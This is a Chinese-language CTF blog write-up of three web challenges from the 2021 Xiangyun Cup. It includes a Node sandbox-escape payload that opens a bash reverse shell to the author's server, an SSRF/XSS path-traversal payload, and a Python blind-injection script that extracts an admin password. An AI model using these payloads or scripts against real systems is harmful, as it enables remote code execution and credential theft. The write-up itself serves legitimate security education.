<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>2021祥云杯WEB-WP | dota_st</title><meta name="keywords" content="CTF"><meta name="author" content="dota_st"><meta name="copyright" content="dota_st"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="¶前言 谢谢各位哥哥带我进前三十❤️，想写wp的时候i春秋那边已经关了环境，所以去buu进行了复现。不过题目暂时还没上全，所以先解已经上线的题目（后续题目上线再补全）。 团队完整wp地址：https:&#x2F;&#x2F;wp.n03tack.top&#x2F;posts&#x2F;62454&#x2F; ¶cralwer_z zombie曾有个历史漏洞：https:&#x2F;&#x2F;ha.cker.in&#x2F;index.php&#x2F;Article&#x2F;13563 ，我"><meta property="og:type" content="article"><meta property="og:title" content="2021祥云杯WEB-WP"><meta property="og:url" content="https://www.wlhhlc.top/posts/20107/index.html"><meta property="og:site_name" content="dota_st"><meta property="og:description" content="¶前言 谢谢各位哥哥带我进前三十❤️，想写wp的时候i春秋那边已经关了环境，所以去buu进行了复现。不过题目暂时还没上全，所以先解已经上线的题目（后续题目上线再补全）。 团队完整wp地址：https:&#x2F;&#x2F;wp.n03tack.top&#x2F;posts&#x2F;62454&#x2F; ¶cralwer_z zombie曾有个历史漏洞：https:&#x2F;&#x2F;ha.cker.in&#x2F;index.php&#x2F;Article&#x2F;13563 ，我"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/G%7D3K%5DE3_XQK%7B1_T5%24SW%5BF6N.png"><meta property="article:published_time" content="2021-08-24T02:06:54.000Z"><meta property="article:modified_time" content="2022-02-13T16:36:08.882Z"><meta property="article:author" content="dota_st"><meta property="article:tag" content="CTF"><meta name="twitter:card" content="summary"><meta name="twitter:image" content="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/G%7D3K%5DE3_XQK%7B1_T5%24SW%5BF6N.png"><link rel="shortcut icon" href="https://cdn.jsdelivr.net/gh/dota-st/blog_file/E595997D44EF7013BFD08323A4506527.png"><link rel="canonical" href="https://www.wlhhlc.top/posts/20107/"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="//busuanzi.ibruce.info"><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.2.0',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE={isPost:!0,isHome:!1,isHighlightShrink:!1,isSidebar:!0,postUpdate:"2022-02-14 00:36:08"}</script><noscript><style>#nav{opacity:1}.justified-gallery img{opacity:1}#post-meta time,#recent-posts time{display:inline!important}</style></noscript><script>(function () {
  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }

  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }
})()</script><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/dota-st/blog_file/background.min.css"><meta name="referrer" content="no-referrer-when-downgrade"><link rel="stylesheet" href="/css/tag-diy.css"><meta name="generator" content="Hexo 5.2.0"></head><body><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/GamerNoTitle/Picture-repo-v1@master/css/APlayer.min.css"><div id="aplayer"></div><script src="https://cdn.jsdelivr.net/gh/GamerNoTitle/Picture-repo-v1@master/js/APlayer.min.js"></script><div id="loading-box"><div class="loading-left-bg"></div><div class="loading-right-bg"></div><div class="spinner-box"><div class="configure-border-1"><div class="configure-core"></div></div><div class="configure-border-2"><div class="configure-core"></div></div><div class="loading-word">加载中...</div></div></div><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="https://blog-file-1302856486.file.myqcloud.com/%E5%A4%B4%E5%83%8F.png" onerror='onerror=null,src="/img/friend_404.gif"' alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">21</div></a></div></div><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">6</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i> <span>首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i> <span>时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i> <span>标签</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i> <span>友链</span></a></div><div class="menus_item"><a class="site-page" href="/tools/"><i class="fa-fw fas fa-tools"></i> <span>工具</span></a></div><div class="menus_item"><a class="site-page" href="/messageboard/"><i class="fa-fw fa fa-paper-plane"></i> <span>留言板</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i> <span>关于我</span></a></div></div></div></div><div id="body-wrap"><div id="web_bg"></div><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#cralwer-z"><span class="toc-number">2.</span> <span class="toc-text">cralwer_z</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#secrets-of-admin"><span class="toc-number">3.</span> <span class="toc-text">secrets_of_admin</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Package-Manager"><span class="toc-number">4.</span> <span class="toc-text">Package Manager</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%A9%E4%B8%8B%E7%9A%84%E7%AD%89buu%E6%9B%B4%E6%96%B0"><span class="toc-number">5.</span> <span class="toc-text">剩下的等buu更新</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image:url(https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/G%7D3K%5DE3_XQK%7B1_T5%24SW%5BF6N.png)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">dota_st</a></span><span id="menus"><div id="search_button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i> <span>搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i> <span>首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i> <span>时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i> <span>标签</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i> <span>友链</span></a></div><div class="menus_item"><a class="site-page" href="/tools/"><i class="fa-fw fas fa-tools"></i> <span>工具</span></a></div><div class="menus_item"><a class="site-page" href="/messageboard/"><i class="fa-fw fa fa-paper-plane"></i> <span>留言板</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i> <span>关于我</span></a></div></div><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">2021祥云杯WEB-WP</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-08-24T02:06:54.000Z" title="发表于 2021-08-24 10:06:54">2021-08-24</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-02-13T16:36:08.882Z" title="更新于 2022-02-14 00:36:08">2022-02-14</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">956</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>4分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h2 id="前言"><a class="header-anchor" href="#前言">¶</a>前言</h2><p>谢谢各位哥哥带我进前三十❤️，想写wp的时候i春秋那边已经关了环境，所以去buu进行了复现。不过题目暂时还没上全，所以先解已经上线的题目（后续题目上线再补全）。<br>团队完整wp地址：<a target="_blank" rel="noopener external nofollow noreferrer" href="https://wp.n03tack.top/posts/62454/">https://wp.n03tack.top/posts/62454/</a></p><h2 id="cralwer-z"><a class="header-anchor" href="#cralwer-z">¶</a>cralwer_z</h2><p>zombie曾有个历史漏洞：<a target="_blank" rel="noopener external nofollow noreferrer" href="https://ha.cker.in/index.php/Article/13563">https://ha.cker.in/index.php/Article/13563</a> ，我们需要想办法成功利用这个漏洞<br>本题关键代码在user.js文件，在路由profile的post请求方法中，会将输入的<code>bucket</code>值赋值给<code>personalBucket</code><br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/cralwer_z/5%5D%7D%28A%7BCL%297ML_%29TSJK0U0%40Q.png" alt=""><br>而在verify路由中，如果token检验正确就会进入if方法，将<code>personalBucket</code>更新到<code>bucket</code>中<br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/cralwer_z/%40HOT_4S%601YB%7BO%255XH78W%5DN2.png" alt=""><br>但是可以看到这里正则进行了严格的限制<br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/cralwer_z/Z0VT%5DDL_QX%7D%7B%40Q%244%5B%24DR9W6.png" alt=""><br>即我们只能输入<code>https://32位数字或者字母.oss-cn-beijing.ichunqiu.com/</code>的形式，输入其他的无法将<code>personalBucket</code>更新到<code>bucket</code>中，不过这里有个变量覆盖的问题</p><ol><li>我们先正常进行请求，会跳转到<code>/user/verify</code>，更新<code>bucket</code>的同时获得了token</li><li>我们构造自己的ip地址，修改<code>personalBucket</code></li><li>用第一步获得的token去请求<code>/user/verify</code>，会把<code>personalBucket</code>更新到<code>bucket</code>中，完成变量覆盖</li></ol><p>思路已经很明确了，我们先在自己的vps上面放一个 <strong>exp.html</strong> ，内容为zombie漏洞的exp，下面ip和端口改成自己的</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;c=<span class="string">&#x27;constructor&#x27;</span>;<span class="built_in">this</span>[c][c](<span class="string">&quot;c=&#x27;constructor&#x27;;require=this[c][c](&#x27;return process&#x27;)().mainModule.require;var sync=require(&#x27;child_process&#x27;).spawnSync; var ls = sync(&#x27;bash&#x27;, [&#x27;-c&#x27;,&#x27;bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1&#x27;],);console.log(ls.output.toString());&quot;</span>)()&lt;/script&gt;</span><br></pre></td></tr></table></figure><p>然后就是进行正常请求，url会跳转到<code>verify</code>获取token<br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/cralwer_z/0VMW2NB8RHHVCT%5B598X5%28BU.png" alt="">然后因为<code>checkBucket</code>的限制，我们需要带上<code>oss-cn-beijing.ichunqiu.com</code><br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/cralwer_z/8MPYWXNW~G1L~6SFYC9O_F1.png" alt=""><br>所以我们<code>bucket</code>输入如下<br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/cralwer_z/741VRG5LHCP%5DP%28LDUC1G6HR.png" alt=""><br>然后就是再访问一次</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;7d064cc8-729a-478d-bc90-bdd45876b751.node4.buuoj.cn:81&#x2F;user&#x2F;verify?token&#x3D;aa647751ec8004b5745271304ab5ed38a149a9c76214e79e81c49dc934ac5e0f</span><br></pre></td></tr></table></figure><p>我们输入的<code>personalBucket</code>成功更新到<code>bucket</code>中<br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/cralwer_z/%60AN~A%40G%5B4H%5B28GE%25N3%5BU75M.png" alt=""><br>然后vps那边开启nc监听，浏览器访问<code>7d064cc8-729a-478d-bc90-bdd45876b751.node4.buuoj.cn:81/user/bucket</code>，成功反弹shell<br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/cralwer_z/%405%7BFK%40%609XZI6XSP~8I%7DBMRR.png" alt=""></p><h2 id="secrets-of-admin"><a class="header-anchor" href="#secrets-of-admin">¶</a>secrets_of_admin</h2><p>在 <strong>database.ts</strong> 文件中可以得到admin的密码，密码为e365655e013ce7fdbdbf8f27b418c8fe6dc9354dc4c0328fa02b0ea547659645<br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/secrets_of_admin/DYVG7%28U%5B4%40O2%60T%28%2924%600G%5DH.png" alt=""><br>同时可以观察到flag文件在<code>superuser</code>这个账号中，继续查看 <strong>routes/index.ts</strong> 文件，可以发现此账号被限制登录了，用admin账号登录后，传上去的文件名变成了md5的形式，并且存到<code>superuser</code>账号里<br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/secrets_of_admin/%5BF_RGI44LOQB1LEE9S4%7D33J.png" alt=""><br>不过提供了另一个增加文件的方法<code>/api/files</code><br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/secrets_of_admin/FEJ%25%5DXU_W8%246KC%5B%40P2HN%7BRJ.png" alt=""><br>但限制了本地访问，不过我们可以通过前面的<code>/admin</code>post方法进行 <strong>ssrf</strong> 打本地，继续观察可发现对输入的<code>content</code>进行了过滤<br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/secrets_of_admin/%40DSP4UPVC%28R%25%7B%5B%60%7B%28_3F5VX.png" alt=""><br>可以用数组进行绕过，接着就是构造payload，把 <strong>superuser</strong> 的flag文件添加到 <strong>admin</strong> 账号下</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">content[]&#x3D;&lt;script&gt;location.href&#x3D;&quot;http:&#x2F;&#x2F;127.0.0.1:8888&#x2F;api&#x2F;files?username&#x3D;admin&amp;filename&#x3D;..&#x2F;files&#x2F;flag&amp;checksum&#x3D;be5a14a8e504a66979f6938338b0662c&quot;;&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure><p><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/secrets_of_admin/S%5BX%28W1B%5BL3BVYOI4GCDZZ%5D9.png" alt=""><br>再访问flag文件</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;api&#x2F;files&#x2F;be5a14a8e504a66979f6938338b0662c</span><br></pre></td></tr></table></figure><p><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/secrets_of_admin/4UL%406Q%28~8SS%5B4N%40240%25M%29SD.png" alt=""></p><h2 id="Package-Manager"><a class="header-anchor" href="#Package-Manager">¶</a>Package Manager</h2><p>审计源码，在auth路由方法中存在sql注入漏洞<br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/PackageManager/_7VOA6X1FYULMCSJ0P%25OXMD.png" alt=""><br>构造payload</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">00f355689f5b7cb21e2a34346d9c55cd&quot;||(this.username&#x3D;&#x3D;&quot;admin&quot;&amp;&amp;this.password[i]&#x3D;&#x3D;&quot;j&quot;)||&quot;</span><br></pre></td></tr></table></figure><p><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/PackageManager/HO18%25TL9MLYA0%6086%5B_6NQPL.png" alt=""><br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/PackageManager/HUOTM%60WE3O9R__X~%5D88KJO0.png" alt=""><br>存在盲注，所以写一个python脚本注出密码</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:dota_st</span></span><br><span class="line"><span class="comment"># Date:2021/8/24 22:55</span></span><br><span class="line"><span class="comment"># blog: www.wlhhlc.top</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://b2ac6fa8-4eb4-4c98-9f24-c41b32060edc.node4.buuoj.cn:81/auth&quot;</span></span><br><span class="line">cookies = &#123;<span class="string">&quot;session&quot;</span>: <span class="string">&quot;s%3Ad034-UqbmEKoZTjp_29TmqCvxuec67jE.E3VNBOuM%2BOpzxu%2Fi5ske43e80M2MLDu0FnLwEv9qmDI&quot;</span>&#125;</span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">50</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>, <span class="number">127</span>):</span><br><span class="line">        payload = <span class="string">&quot;00f355689f5b7cb21e2a34346d9c55cd\&quot;||(this.username==\&quot;admin\&quot;&amp;&amp;this.password[&#123;0&#125;]==\&quot;&#123;1&#125;\&quot;)||\&quot;&quot;</span>.<span class="built_in">format</span>(i,<span class="built_in">chr</span>(j))</span><br><span class="line">        data = &#123;<span class="string">&quot;_csrf&quot;</span>: <span class="string">&quot;sShk9REd-9QoAV2EvYHMOAPc6RQ0gjNdeyn4&quot;</span>, <span class="string">&quot;token&quot;</span>: payload&#125;</span><br><span class="line">        res = requests.post(url, cookies=cookies, data=data, allow_redirects=<span class="literal">False</span>)</span><br><span class="line">        <span class="keyword">if</span> res.status_code==<span class="number">302</span>:</span><br><span class="line">            flag +=<span class="built_in">chr</span>(j)</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;password:&quot;</span> + flag)</span><br></pre></td></tr></table></figure><p><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/PackageManager/CZWE0KMO%29WR1TD62%40BCZ%29%5BD.png" alt=""><br>注出admin的密码为<code>!@#&amp;@&amp;@efefef*@((@))grgregret3r</code>，登录后就有flag<br><img src="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/PackageManager/R%290QAR%40SD~R%24S1%40%7BW3GI926.png" alt=""></p><h2 id="剩下的等buu更新"><a class="header-anchor" href="#剩下的等buu更新">¶</a>剩下的等buu更新</h2></div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者:</span> <span class="post-copyright-info"><a href="mailto:undefined" rel="external nofollow noreferrer">dota_st</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接:</span> <span class="post-copyright-info"><a href="https://www.wlhhlc.top/posts/20107/">https://www.wlhhlc.top/posts/20107/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明:</span> <span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow noreferrer" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://www.wlhhlc.top" target="_blank">dota_st</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/CTF/">CTF</a></div><div class="post_share"><div class="social-share" data-image="https://blog-file-1302856486.file.myqcloud.com/2021%E7%A5%A5%E4%BA%91%E6%9D%AF/G%7D3K%5DE3_XQK%7B1_T5%24SW%5BF6N.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><div class="post-reward"><div class="reward-button"><i class="fas fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><a href="https://cdn.jsdelivr.net/gh/dota-st/blog_file/mm_facetoface_collect_qrcode_1601714082856.png" rel="external nofollow noreferrer" target="_blank"><img class="post-qr-code-img" src="https://cdn.jsdelivr.net/gh/dota-st/blog_file/mm_facetoface_collect_qrcode_1601714082856.png" alt="微信"></a><div class="post-qr-code-desc">微信</div></li><li class="reward-item"><a href="https://cdn.jsdelivr.net/gh/dota-st/blog_file/1601714101044.jpg" rel="external nofollow noreferrer" target="_blank"><img class="post-qr-code-img" src="https://cdn.jsdelivr.net/gh/dota-st/blog_file/1601714101044.jpg" alt="支付宝"></a><div class="post-qr-code-desc">支付宝</div></li></ul></div></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/posts/33757/"><img class="prev-cover" src="https://blog-file-1302856486.file.myqcloud.com/web1000%28%E4%BA%8C%29/bbc58c3d998d4f389fdae649334873f7.jpg" onerror='onerror=null,src="/img/404.jpg"'><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">ctfshow-Web1000题系列修炼(二)</div></div></a></div><div class="next-post pull-right"><a href="/posts/3501/"><img class="next-cover" src="https://blog-file-1302856486.file.myqcloud.com/sqlmap-tamper%E7%BC%96%E5%86%99%E5%88%9D%E4%BD%93%E9%AA%8C/index.png" onerror='onerror=null,src="/img/404.jpg"'><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">sqlmap-tamper编写初体验</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i> <span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/posts/64939/" title="2021第五空间大赛WEB-WP"><img class="cover" src="https://n03tack-wp-1302856486.file.myqcloud.com/2021%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4%E5%88%9D%E8%B5%9B/S%24%5B4BFQ%243%29%5BUKSSF0J%7B4%402P.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-09-17</div><div class="title">2021第五空间大赛WEB-WP</div></div></a></div><div><a href="/posts/59745/" title="2022长安战疫网络安全卫士守护赛WP"><img class="cover" src="https://blog-file-1302856486.file.myqcloud.com/2022%E9%95%BF%E5%AE%89%E6%88%98%E7%96%AB/1212355-20220112165242528-1728151902.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-01-19</div><div class="title">2022长安战疫网络安全卫士守护赛WP</div></div></a></div><div><a href="/posts/17489/" title="pwn新手入门之格式化字符串漏洞"><img class="cover" src="https://blog-file-1302856486.file.myqcloud.com/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/43d2de27880811ebb6edd017c2d2eca2.jpg"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-10-22</div><div class="title">pwn新手入门之格式化字符串漏洞</div></div></a></div><div><a href="/posts/3501/" title="sqlmap-tamper编写初体验"><img class="cover" src="https://blog-file-1302856486.file.myqcloud.com/sqlmap-tamper%E7%BC%96%E5%86%99%E5%88%9D%E4%BD%93%E9%AA%8C/index.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-07-19</div><div class="title">sqlmap-tamper编写初体验</div></div></a></div><div><a href="/posts/25127/" title="CtfShow萌新区WP"><img class="cover" src="https://blog-file-1302856486.file.myqcloud.com/ctfshow%E8%90%8C%E6%96%B0/205458-155593769824cb.jpg"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-01-15</div><div class="title">CtfShow萌新区WP</div></div></a></div><div><a href="/posts/33757/" title="ctfshow-Web1000题系列修炼(二)"><img class="cover" src="https://blog-file-1302856486.file.myqcloud.com/web1000%28%E4%BA%8C%29/bbc58c3d998d4f389fdae649334873f7.jpg"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-08-26</div><div class="title">ctfshow-Web1000题系列修炼(二)</div></div></a></div></div></div></article></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2022<i id="heartbeat" class="fa fas fa-heartbeat"></i> dota_st</div><div class="framework-info"><span>dota_st</span> <span class="footer-separator">|</span><span>博客</span></div><div class="icp"><a target="_blank" rel="noopener external nofollow noreferrer" href="http://beian.miit.gov.cn"><img class="icp-icon" src="/img/icp.png"><span>琼ICP备2020003865号</span></a></div><html></html><head><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/HCLonely/images@master/others/heartbeat.min.css"></head><body><span id="sitetime"></span><script language="javascript">function siteTime(){window.setTimeout("siteTime()",1e3);var e=36e5,t=24*e,o=new 